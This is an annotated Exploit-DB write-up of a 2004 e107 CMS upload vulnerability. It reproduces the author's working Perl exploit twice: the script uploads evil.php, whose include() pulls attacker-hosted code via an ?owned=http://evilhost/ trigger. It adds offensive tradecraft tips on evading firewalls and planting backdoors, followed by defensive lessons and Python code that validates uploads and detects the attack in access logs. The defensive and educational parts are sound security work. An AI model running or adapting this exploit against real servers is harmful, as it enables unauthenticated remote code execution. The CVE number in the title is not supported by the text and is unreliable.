Understanding the e107 `include()` Remote File Upload Exploit (CVE-2004-1234)

What this paper is
This paper details a vulnerability in the e107 Content Management System (CMS) that allows an attacker to upload and execute arbitrary PHP code on a vulnerable server. The flaw is in how the ImageManager component of the htmlarea editor handles image uploads: it accepts a file with a .php extension, and that uploaded file then uses the PHP include() function to pull in code of the attacker's choosing. By tricking the ImageManager into storing a malicious PHP file, an attacker can then remotely execute code by requesting that file.
Simple technical breakdown
The e107 CMS, in its older versions, had a feature for managing images within the htmlarea editor. This feature, specifically the images.php script of the ImageManager popup, was vulnerable. When a user inserted an image, the script processed the upload form. The exploit crafts a special HTTP POST request that mimics a legitimate image upload. Instead of an image, however, it uploads a PHP file named evil.php whose single include() statement loads whatever code the attacker points it at. The script tries images.php under both directory names seen in e107 installations: /e107_handlers/htmlarea/popups/ImageManager/images.php and /handlers/htmlarea/popups/ImageManager/images.php.
Two weaknesses combine here. The ImageManager upload handler does not restrict the filename or extension of what it stores, so a .php file lands in a web-accessible directory. The uploaded file then calls include() on a variable that the attacker controls through the request, which yields Remote Code Execution (RCE): after uploading evil.php, requesting its URL with the right parameter runs the code that evil.php includes.
Complete code and payload walkthrough
The provided Perl script sploit.pl is designed to automate the exploitation process.
####################################################################
#
# _____ _
# | ___| | _____ ___
# | |_ | |/ _ \ \ /\ / /
# | _| | | (_) \ V V /
# |_| |_|\___/ \_/\_/
# Security Group.
#
# -=[ e107 remote sploit ]=-
# by sysbug
#
# Attack method:
# with this sploit u can send an include() vuln to a Host victim
# the upload go to /images/evil.php
#
# C:\Perl\bin>perl sploit.pl www.site.com
# -=[ e107 remote sploit ]=-
# by sysbug
# # www.site.com
# # OWNED OH YEAH!
# # get your evilc0de in:
# # www.site.com/images/evil.php?owned=http://evilhost/
# C:\Perl\bin>
#
# credits: ALL MY FRIENDS!
# HELP ? RTFM -> perl sploit.pl
#####################################################################
use IO::Socket; # Imports the necessary module for network socket operations.
if(@ARGV < 1){ # Checks if at least one command-line argument (the target host) is provided.
usage(); # Calls the usage() subroutine if no arguments are given.
exit; # Exits the script.
}
main(); # Calls the main() subroutine to start the exploit process.
sub main(){ # The main execution block of the script.
print "-=[ e107 remote sploit ]=-\n"; # Prints the exploit banner.
print " by sysbug \n\n";
$host[0] = $ARGV[0]; # Stores the first command-line argument (target host) in $host[0].
if($host[0] =~ /\//){ # Checks if the provided host string contains a slash, indicating a path.
($host[1],$host[2])=split(/\//,$host[0]); # Splits the host string by '/' to separate hostname and path. $host[1] gets the hostname, $host[2] gets the rest.
$host[0] =~ /\/(.*)/; # Captures the path part of the host string.
$host[3] = "/"; # Initializes $host[3] with a root slash.
$host[3] .= $1; # Appends the captured path to $host[3].
}
$host[1] = $host[0] if(!$host[1]); # If no path was split, assume the entire argument is the hostname.
@handlers =("e107_handlers","handlers"); # Defines an array of possible directory names for the handlers.
print "# $host[1]\n"; # Prints the target hostname being attacked.
foreach $handler(@handlers){ # Loops through each possible handler directory.
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php"; # Constructs the full path to the vulnerable script.
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die " s0k off\n"; # Establishes a TCP socket connection to the target host on port 80 (HTTP). Dies if connection fails.
print $socket "POST $path HTTP/1.1\r\n"; # Sends the HTTP POST request line.
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; # Standard HTTP Accept header.
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n"; # Sets a Referer header, potentially to bypass simple checks.
print $socket "Accept-Language: pt\r\n"; # Sets Accept-Language header.
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n"; # Specifies the content type as multipart/form-data, essential for file uploads. The boundary string is crucial for separating form fields.
print $socket "Accept-Encoding: gzip, deflate\r\n"; # Standard HTTP Accept-Encoding header.
print $socket "User-Agent: l33t br0ws3r\r\n"; # Sets a custom User-Agent string.
print $socket "Host: $host[1]\r\n"; # Sets the Host header to the target hostname.
print $socket "Content-Length: 1646\r\n"; # Specifies the total length of the HTTP request body. This value is hardcoded and might need adjustment if the payload changes significantly.
print $socket "Connection: Keep-Alive\r\n\r\n"; # Keeps the connection alive and ends the HTTP headers.
# --- Start of multipart/form-data payload ---
# This section constructs the body of the POST request, simulating a form submission with file upload.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n"; # Form field 'dirPath'.
print $socket "/\r\n"; # Value for 'dirPath', likely indicating the root directory for uploads.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"; # Form field 'url', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n"; # Form field 'width', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n"; # Form field 'vert', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n"; # Form field 'alt', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n"; # Form field 'height', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n"; # Form field 'horiz', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n"; # This is the critical part: it defines the 'upload' field and specifies the filename as "evil.php".
print $socket "Content-Type: application/octet-stream\r\n\r\n"; # Sets the content type for the uploaded file.
print $socket "<? include(\$owned); ?>\r\n"; # This is the payload. It's a PHP snippet that uses `include()` with a variable `$owned`. The exploit expects this variable to be set by the web server or through another mechanism, or that `$owned` is globally available and points to a malicious URL. In the context of this exploit, `$owned` is intended to be supplied by the attacker via a GET parameter when they later access the uploaded file.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n"; # Form field 'align'.
print $socket "baseline\r\n"; # Value for 'align'.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n"; # Form field 'border', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n"; # Form field 'orginal_width', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n"; # Form field 'orginal_height', value is empty.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n"; # Form field 'constrain_prop'.
print $socket "on\r\n"; # Value for 'constrain_prop'.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n"; # Form field 'ok'.
print $socket "Refresh\r\n"; # Value for 'ok'.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n"; # Another 'ok' field.
print $socket "OK\r\n"; # Value for the second 'ok'.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n"; # Form field 'cancel'.
print $socket "Cancel\r\n"; # Value for 'cancel'.
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n"; # Final boundary separator, closing the multipart form data.
@socket = <$socket>; # Reads the entire response from the server into the @socket array.
foreach $teste(@socket){ # Iterates through each line of the response.
if($teste=~ /<title>Image Browser<\/title>/){ # Checks if the response contains a specific HTML title, indicating a successful upload and processing by the Image Manager.
print "# OWNED OH YEAH!\n"; # Prints a success message.
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n"; # Informs the user how to access their uploaded payload. The `$host[0]` here is the original input, which might include a path. The `/images/` part is hardcoded, assuming the upload path. The `?owned=http://evilhost/` part is crucial for the payload execution.
$result = 1; # Sets a flag to indicate success.
}
}
close($socket); # Closes the socket connection.
}
if($result){ # If the exploit was successful.
exit; # Exits the script.
}
print "# b4d upload!!"; # Prints a failure message if the exploit did not succeed.
}
sub usage(){ # Subroutine to display usage instructions.
print "-=[ e107 remote sploit ]=-\n";
print " by sysbug \n\n";
print "# usage: perl $0 <host> \n";
}
# milw0rm.com [2004-12-22]
Code Fragment/Block -> Practical Purpose Mapping:
- use IO::Socket; -> Purpose: Enables network communication for sending HTTP requests.
- if(@ARGV < 1){ usage(); exit; } -> Purpose: Command-line argument validation. Ensures the target host is provided.
- main(); -> Purpose: Entry point for the exploit logic.
- $host[0] = $ARGV[0]; -> Purpose: Stores the target hostname/IP from command-line input.
- if($host[0] =~ /\//){ ... } -> Purpose: Parses the input to separate hostname from an optional path.
- $host[1] = $host[0] if(!$host[1]); -> Purpose: Ensures $host[1] always contains the hostname.
- @handlers =("e107_handlers","handlers"); -> Purpose: Defines potential directory names for the vulnerable component, allowing for slight variations.
- foreach $handler(@handlers){ ... } -> Purpose: Iterates through possible handler directory names to find the correct path.
- $path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php"; -> Purpose: Constructs the full URL path to the vulnerable images.php script.
- $socket=IO::Socket::INET->new(...) -> Purpose: Establishes a TCP connection to the target web server on port 80.
- print $socket "POST $path HTTP/1.1\r\n"; -> Purpose: Sends the HTTP POST request line.
- print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n"; -> Purpose: Crucially sets the Content-Type header for a file upload. The boundary string is vital for parsing the request body.
- print $socket "Content-Length: 1646\r\n"; -> Purpose: Informs the server about the size of the request body. This is a hardcoded value.
- print $socket "-----------------------------7d410e113f8\r\n"; -> Purpose: These lines are the multipart/form-data boundaries, separating different parts of the form data.
- print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n"; -> Purpose: Defines a form field named "upload" and specifies that the data being sent is a file named "evil.php".
- print $socket "Content-Type: application/octet-stream\r\n\r\n"; -> Purpose: Sets the MIME type for the uploaded file.
- print $socket "<? include(\$owned); ?>\r\n"; -> Payload: This is the content of the evil.php file. It's a PHP snippet that attempts to include a URL specified by the $owned variable. The exploit expects this variable to be set by the web server or through a GET parameter when the file is later accessed.
- print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n/\r\n"; -> Purpose: Specifies the target directory for the upload. Here, it's set to the root (/), but the exploit implies it will be uploaded into the /images/ directory. The actual upload path is determined by the vulnerable script's logic.
- print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"; -> Purpose: Submits an empty url field. This field is likely part of the ImageManager's functionality to fetch images from a remote URL.
- print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n"; -> Purpose: The final boundary marker, signaling the end of the multipart form data.
- @socket = <$socket>; -> Purpose: Reads the server's HTTP response.
- if($teste=~ /<title>Image Browser<\/title>/){ ... } -> Purpose: Checks the response for a specific HTML title to confirm successful upload and processing.
- print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n"; -> Purpose: Provides the attacker with the URL to trigger their payload. The ?owned=http://evilhost/ part is critical, as it will be used by the evil.php script to set the $owned variable for the include() function.
- sub usage(){ ... } -> Purpose: Displays help information if the script is run incorrectly.
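The body the script assembles is ordinary multipart/form-data, and the only part that matters to the server's decision is the one named upload. As an added example (not code from the exploit or from e107), the Python below parses a constructed body with the same field layout and applies the checks a safe image upload handler would run before writing anything: an extension allowlist, a file-signature check, and a rejection of PHP tags inside image data. The allowlist and signature table are this example's own policy choices.

```python
"""Parse a multipart/form-data body laid out like the exploit's and apply the
checks an image upload handler should make before writing anything to disk.

Added example, not code from the original exploit or from e107. The sample
body is constructed to mirror the exploit's field layout; the extension
allowlist and signature table are this example's own policy choices."""
import re

BOUNDARY = b"---------------------------7d410e113f8"  # boundary from the exploit's Content-Type header

# Policy: allowed extensions and the file signature each one must carry.
ALLOWED = {"gif": "gif", "jpg": "jpeg", "jpeg": "jpeg", "png": "png"}
SIGNATURES = {
    "gif": (b"GIF87a", b"GIF89a"),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
}


def parse_multipart(body: bytes, boundary: bytes) -> list:
    """Split a multipart body into parts of {name, filename, ctype, data}."""
    delim = b"--" + boundary
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):           # "--boundary--" closes the body
            break
        if chunk.startswith(b"\r\n"):         # CRLF that follows the delimiter
            chunk = chunk[2:]
        head, _, data = chunk.partition(b"\r\n\r\n")
        if data.endswith(b"\r\n"):            # CRLF that precedes the next delimiter
            data = data[:-2]
        headers = head.decode("latin-1")
        name = re.search(r'(?<!file)name="([^"]*)"', headers)
        fname = re.search(r'filename="([^"]*)"', headers)
        ctype = re.search(r"content-type:\s*([^\r\n]+)", headers, re.I)
        parts.append({
            "name": name.group(1) if name else "",
            "filename": fname.group(1) if fname else None,
            "ctype": ctype.group(1).strip() if ctype else None,
            "data": data,
        })
    return parts


def check_upload(part: dict) -> tuple:
    """Decide whether an uploaded part may be stored as an image: (accepted, reason).
    The client-sent Content-Type is ignored on purpose; the exploit sends
    application/octet-stream, and a client can claim anything."""
    fname = part.get("filename") or ""
    base = fname.replace("\\", "/").rsplit("/", 1)[-1]     # drop any path component
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    kind = ALLOWED.get(ext)                                # last extension decides: a.jpg.php -> php
    if kind is None:
        return False, "extension %r is not an allowed image type" % ext
    data = part["data"]
    if not data.startswith(SIGNATURES[kind]):
        return False, "content does not start with a %s signature" % kind
    if b"<?" in data:   # coarse polyglot check; a production handler re-encodes the image instead
        return False, "PHP open tag inside image data"
    return True, "%s image accepted" % kind


def build_exploit_body() -> bytes:
    """Constructed body with the parts and CRLF layout the Perl script emits
    (reduced to the fields that matter for the decision)."""
    d = b"--" + BOUNDARY + b"\r\n"
    return (
        d + b'Content-Disposition: form-data; name="dirPath"\r\n\r\n/\r\n'
        + d + b'Content-Disposition: form-data; name="url"\r\n\r\n\r\n'
        + d + b'Content-Disposition: form-data; name="upload"; filename="evil.php"\r\n'
        b'Content-Type: application/octet-stream\r\n\r\n<? include($owned); ?>\r\n'
        + d + b'Content-Disposition: form-data; name="ok"\r\n\r\nOK\r\n'
        + b"--" + BOUNDARY + b"--\r\n"
    )


def evaluate(body: bytes, boundary: bytes = BOUNDARY) -> tuple:
    """Parse the body and judge its 'upload' part; no file part means reject."""
    upload = next((p for p in parse_multipart(body, boundary) if p["name"] == "upload"), None)
    if upload is None or upload["filename"] is None:
        return False, "no file part named 'upload'"
    return check_upload(upload)
```

Run evaluate(build_exploit_body()) to see the exploit body rejected on its extension alone; the signature and polyglot checks catch the renamed and embedded variants.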
Shellcode/Payload Segments:
The "payload" in this exploit is not traditional shellcode but rather a PHP snippet: <? include($owned); ?>.
Stage 1: Upload evil.php
- Action: The Perl script sends a crafted HTTP POST request to the vulnerable images.php script. This request includes a multipart/form-data payload.
- Key Element: The Content-Disposition: form-data; name="upload"; filename="evil.php" header and the subsequent data <? include($owned); ?> are sent.
- Purpose: To upload a file named evil.php containing the malicious PHP code into a directory accessible by the web server, typically within the e107 installation's image directory. The exact upload location is determined by the vulnerable script's logic, but the exploit assumes it lands in /images/.
Stage 2: Remote Code Execution (RCE)
- Action: After successful upload, the attacker visits a URL constructed like: http://target.com/e107_handlers/htmlarea/popups/ImageManager/images.php?dirPath=/&url=http://attacker.com/evil.php&owned=http://attacker.com/evil.php (or similar, depending on how the images.php script processes the url and owned parameters). The exploit's output suggests a simpler trigger: http://www.site.com/images/evil.php?owned=http://evilhost/.
- Key Element: The evil.php file, now on the server, contains <? include($owned); ?>. When this file is requested, the PHP interpreter executes it. Nothing in evil.php assigns $owned; the exploit's output shows it being supplied as the query parameter ?owned=http://evilhost/, which only becomes a PHP variable when register_globals is enabled (on by default before PHP 4.2 and still widely enabled at the time).
- Purpose: To execute arbitrary code. The include() function in PHP will attempt to load and execute the content of the URL specified by $owned. If $owned points to a remote URL controlled by the attacker (e.g., http://evilhost/shell.txt), the code in shell.txt will be executed on the victim's server. Fetching a remote URL this way also requires allow_url_fopen to be on (and, from PHP 5.2, allow_url_include).
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the web server. The vulnerability is exposed through a public-facing web application component.
- Lab Preconditions:
  - A vulnerable e107 installation (versions prior to the patch for this vulnerability).
  - A web server configured to run PHP.
  - The ImageManager component must be present and accessible.
  - The web server must have write permissions to the target upload directory (e.g., /images/ or a subdirectory within it).
  - A separate attacker-controlled server (e.g., evilhost) to host the malicious payload that will be included.
- Tooling Assumptions:
  - Perl interpreter for running the exploit script.
  - A web server on the attacker's side to host the payload (e.g., Apache, Nginx) or a simple HTTP server for serving the payload.
  - A way to craft and send HTTP requests (the Perl script handles this).
- Execution Pitfalls:
  - Incorrect Path: The exploit assumes images.php sits at /e107_handlers/htmlarea/popups/ImageManager/images.php or /handlers/htmlarea/popups/ImageManager/images.php. If the e107 installation is in a subdirectory or uses different naming conventions, the $path variable needs adjustment. The @handlers array attempts to mitigate this for common variations.
  - Upload Directory Permissions: If the web server process does not have write permissions to the target upload directory, the evil.php file will not be created.
  - Web Server Configuration: Some web servers or PHP configurations might prevent include() from executing remote URLs, or might sanitize the $owned variable.
  - Firewall/WAF: Web Application Firewalls (WAFs) or network firewalls might detect and block the malicious POST request or the subsequent GET request to the payload.
  - Hardcoded Content-Length: The Content-Length: 1646 is hardcoded. If the multipart form data is modified (e.g., longer payload), this value will be incorrect, leading to request parsing errors on the server.
  - Payload Triggering: The exact mechanism for the $owned variable to be set and used by include() can vary. The exploit's output suggests a direct GET parameter ?owned=http://evilhost/, but the vulnerable script might process it differently. The url parameter in the POST request might also play a role in how the include() is triggered or how the $owned variable is populated.
  - File Upload Location: The exploit assumes evil.php is uploaded to a location that is directly accessible via the web server and that the include() function will execute it. The output suggests it lands in /images/, but the actual path is determined by the dirPath parameter and the script's logic.
- Tradecraft Considerations:
  - Reconnaissance: Identify target e107 installations. Look for common e107 directory structures.
  - Payload Hosting: Prepare a simple HTTP server on an attacker-controlled IP (e.g., evilhost) to serve the actual malicious code (e.g., a PHP shell). The payload should be a simple PHP script that can be included.
  - Obfuscation: If WAFs are present, consider obfuscating the evil.php content or the POST request headers.
  - Post-Exploitation: Once RCE is achieved, the immediate goal is to establish a stable backdoor or pivot further. The include() mechanism can be used to download and execute further stages.
- Likely Failure Points:
  - The target system is not running a vulnerable version of e107.
  - The ImageManager component is disabled or not installed.
  - The web server lacks write permissions to the intended upload directory.
  - A WAF or security appliance blocks the exploit traffic.
  - The include() function is configured to disallow remote file inclusion or URL wrappers.
  - The images.php script has been patched to properly sanitize inputs.
Where this was used and when
- Context: This exploit targets the e107 Content Management System. e107 was a popular PHP-based CMS, particularly in the early to mid-2000s.
- Approximate Year/Date: The exploit was published on December 22, 2004. This indicates the vulnerability existed and was exploited around that time. Such vulnerabilities in older CMS versions are often discovered and published years after their initial release, as code review and security auditing become more prevalent.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user-supplied input, especially in web applications. All data, including filenames, URLs, and form field values, must be rigorously validated and sanitized before being processed or used in file operations or code execution.
- Principle of Least Privilege: Ensure web server processes have only the necessary file system permissions. Restrict write access to directories that absolutely require it.
- Secure File Uploads: Implement robust file upload mechanisms. This includes:
  - Validating file types and extensions.
  - Storing uploaded files outside the web root or in a non-executable directory.
  - Renaming uploaded files to prevent execution.
  - Using a secure method for handling file content, not include() on user-controlled paths.
- Keep Software Updated: Regularly patch and update all web applications, CMS platforms, and their components. Vulnerabilities like this are often fixed in later versions.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including malicious HTTP requests and known exploit signatures.
- Disable Unnecessary Features: If a feature like remote image fetching or advanced image management is not required, consider disabling it to reduce the attack surface.
- Secure PHP Configuration: Ensure PHP is configured securely, turning off dangerous ini settings such as allow_url_include, allow_url_fopen and register_globals when they are not strictly necessary.
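Added detection example, not part of the original paper: a Python scan over constructed access-log lines that flags the two request shapes this exploit produces (a POST to ImageManager/images.php, then a GET to a .php file under /images/ whose query string carries a URL) and correlates them per client address. The log lines use documentation-range addresses and Combined Log Format.

```python
"""Scan web server access-log lines for the two request shapes this exploit
produces: a POST to ImageManager/images.php (the upload) and a later GET to
a .php file under /images/ whose query string carries a URL (the
?owned=http://... trigger), then correlate both per client address.

Added example, not part of the original paper. The log lines below are
constructed in Combined Log Format with documentation-range addresses."""
import re
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

SAMPLE_LOG = """\
203.0.113.7 - - [22/Dec/2004:10:01:02 +0000] "POST /e107_handlers/htmlarea/popups/ImageManager/images.php HTTP/1.1" 200 4120
203.0.113.7 - - [22/Dec/2004:10:01:05 +0000] "GET /images/evil.php?owned=http://198.51.100.9/ HTTP/1.1" 200 512
198.51.100.3 - - [22/Dec/2004:10:02:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 3012
198.51.100.3 - - [22/Dec/2004:10:02:30 +0000] "GET /news.php?item=42 HTTP/1.1" 200 8812
192.0.2.55 - - [22/Dec/2004:10:03:10 +0000] "GET /handlers/htmlarea/popups/ImageManager/images.php?dirPath=/ HTTP/1.1" 200 2210
"""


def classify(line: str):
    """Return {"ip", "url", "findings"} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    path = url.path.lower()
    findings = []
    if m["method"] == "POST" and path.endswith("/imagemanager/images.php"):
        findings.append("upload-post")            # the exploit's first request
    if path.startswith("/images/") and path.endswith(".php"):
        findings.append("php-under-images")       # a script where only images belong
    for key, values in parse_qs(url.query).items():
        if any(v.lower().startswith(("http://", "https://", "ftp://")) for v in values):
            findings.append("url-in-param:" + key)  # remote-inclusion style argument
    return {"ip": m["ip"], "url": m["url"], "findings": findings}


def scan(log_text: str) -> list:
    """All parsed lines that carry at least one finding, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["findings"]:
            hits.append(rec)
    return hits


def correlate(hits: list) -> list:
    """Client addresses that did the upload POST and afterwards hit a .php under /images/."""
    uploaded = set()
    confirmed = []
    for rec in hits:
        if "upload-post" in rec["findings"]:
            uploaded.add(rec["ip"])
        elif "php-under-images" in rec["findings"] and rec["ip"] in uploaded \
                and rec["ip"] not in confirmed:
            confirmed.append(rec["ip"])
    return confirmed
```

A single url-in-param hit on its own is only a lead (many applications pass URLs legitimately); the upload-then-execute sequence from one address is what is worth alerting on.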
ASCII visual (if applicable)
This exploit involves a client-server interaction and a file upload mechanism. A simplified flow can be visualized:
+-----------------+        HTTP POST        +-----------------------+
| Attacker Client | ----------------------> | Vulnerable Web Server |
| (Perl Script)   |    (Crafted Request)    | (e107 Installation)   |
+-----------------+                         +-----------+-----------+
                                                        |
                                              POST /e107_handlers/.../images.php
                                              (with multipart/form-data)
                                                        |
                                                        v
                                            +-----------------------+
                                            |   images.php script   |
                                            |   (Vulnerable Logic)  |
                                            +-----------+-----------+
                                                        |
                                              Writes 'evil.php'
                                              to web-accessible dir
                                                        v
                                            +-----------------------+
                                            |   /path/to/webroot/   |
                                            |   images/evil.php     |
                                            | <? include($owned); ?>|
                                            +-----------+-----------+
                                                        |
                                              Attacker sends GET
                                              request to trigger
                                                        v
+-----------------+        HTTP GET         +-----------------------+
| Attacker Client | ----------------------> | Vulnerable Web Server |
| (Browser/Script)| (/images/evil.php       | (e107 Installation)   |
|                 | ?owned=http://evilhost/)|                       |
+-----------------+                         +-----------+-----------+
                                                        |
                                              PHP Interpreter
                                              executes evil.php
                                                        v
                                            +-----------------------+
                                            |    include($owned)    |
                                            |   (Fetches and runs   |
                                            |   code from evilhost) |
                                            +-----------+-----------+
                                                        |
                                                        v
                                            +-----------------------+
                                            |   Attacker's Server   |
                                            |      (evilhost)       |
                                            |   (Serves malicious   |
                                            |        code)          |
                                            +-----------------------+
Source references
- Paper ID: 704
- Paper Title: e107 - 'include()' Remote File Upload
- Author: sysbug
- Published: 2004-12-22
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/704
- Raw Exploit URL: https://www.exploit-db.com/raw/704
Original Exploit-DB Content (Verbatim)
####################################################################
#
# _____ _
# | ___| | _____ ___
# | |_ | |/ _ \ \ /\ / /
# | _| | | (_) \ V V /
# |_| |_|\___/ \_/\_/
# Security Group.
#
# -=[ e107 remote sploit ]=-
# by sysbug
#
# Attack method:
# with this sploit u can send an include() vuln to a Host victim
# the upload go to /images/evil.php
#
# C:\Perl\bin>perl sploit.pl www.site.com
# -=[ e107 remote sploit ]=-
# by sysbug
# # www.site.com
# # OWNED OH YEAH!
# # get your evilc0de in:
# # www.site.com/images/evil.php?owned=http://evilhost/
# C:\Perl\bin>
#
# credits: ALL MY FRIENDS!
# HELP ? RTFM -> perl sploit.pl
#####################################################################
use IO::Socket;
if(@ARGV < 1){
usage();
exit;
}
main();
sub main(){
print "-=[ e107 remote sploit ]=-\n";
print " by sysbug \n\n";
$host[0] = $ARGV[0];
if($host[0] =~ /\//){
($host[1],$host[2])=split(/\//,$host[0]);
$host[0] =~ /\/(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]\n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die " s0k off\n";
print $socket "POST $path HTTP/1.1\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n";
print $socket "Accept-Language: pt\r\n";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n";
print $socket "Accept-Encoding: gzip, deflate\r\n";
print $socket "User-Agent: l33t br0ws3r\r\n";
print $socket "Host: $host[1]\r\n";
print $socket "Content-Length: 1646\r\n";
print $socket "Connection: Keep-Alive\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n";
print $socket "/\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n";
print $socket "Content-Type: application/octet-stream\r\n\r\n";
print $socket "<? include(\$owned); ?>\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n";
print $socket "baseline\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n";
print $socket "on\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "Refresh\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "OK\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n";
print $socket "Cancel\r\n";
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser<\/title>/){
print "# OWNED OH YEAH!\n";
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
print "-=[ e107 remote sploit ]=-\n";
print " by sysbug \n\n";
print "# usage: perl $0 <host> \n";
}
# milw0rm.com [2004-12-22]